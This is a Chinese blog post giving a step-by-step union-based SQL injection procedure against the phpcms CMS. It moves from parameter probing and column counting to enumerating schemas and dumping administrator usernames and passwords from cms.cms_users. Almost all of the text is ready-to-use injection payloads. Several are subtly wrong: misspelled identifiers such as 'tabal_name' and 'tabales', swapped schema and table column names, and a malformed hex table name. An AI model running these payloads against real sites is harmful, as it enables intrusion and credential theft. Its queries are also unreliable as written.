美文网首页
phpcms框架SQL注入--基于Havij工具

phpcms框架SQL注入--基于Havij工具

作者: 如常_1 | 来源:发表于2018-10-25 14:21 被阅读0次

    sql注入的步骤:


    1.首先观察网站是通过GET还是POST方式传输数据的:


                       a.如果是GET传输,则在url中输入?id=1' 或者 " 或者 ') 来测试是否存在sql注入。

                       b.如果是POST传输,则在输入框中输入?id=1' 或者 " 或者 ') 来测试是否存在sql注入。

    2.测试完成发现存在注入,进行注入,先测试有多少表单:

                        a.?id=1 order by *(*数字为数字)进行测试,

    3.测试完表单,进行表单查询:

                        a.?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --+

                             (得到回显的表单)

    4.测完回显的数据,就可以进行查询了:

                        a.查询当前数据库:?id=1 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15 --+

                         b.查询用户名:?id=1 and 1=2 union select 1,2,user() ,4,5,6,7,8,9,10,11,12,13,14,15 --+

                         c.查询数据库版本:?id=1 and 1=2 union select 1,2,version() ,4,5,6,7,8,9,10,11,12,13,14,15 --+

                         d.查询全文件位置:?id=1 and 1=2 union select 1,2,@@datadir,4,5,6,7,8,9,10,11,12,13,14,15 --+

    5.得到以上数据,进行全局查询:

                        a.查询数据库:?id=1 and 1=2 union select 1,2,group_concat(convert(tabal_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15  from information_schema.SCHEMATA

                         b.查询数据库表:?id=1 and 1=2 union select 1,2,group_concat(convert(SCHEMA_HAME using

    latin1)),4,5,6,7,8,9,10,11,12,13,14,15  from information_schema.tabales where table _schema=database()    (查询database()中的表)

                          c.查询数据表中的列:?id=1 and 1=2 union select 1,2,group_concat(convert(column_name using

    latin1)),4,5,6,7,8,9,10,11,12,13,14,15  from information_schema.columns where table _name=0x636D735F75736557273(CMS USER)  # 表名需要编码为16进制

                           d.查询管理员账号和密码:?id= 1 and 1=2 union select 1,2,concat_ws(0x2b,userid,username,password),4,5,6,7,8,9,10,11,12,13,14,15  from cms.cms_users

    相关文章

      网友评论

          本文标题:phpcms框架SQL注入--基于Havij工具

          本文链接:https://www.haomeiwen.com/subject/qmfkzftx.html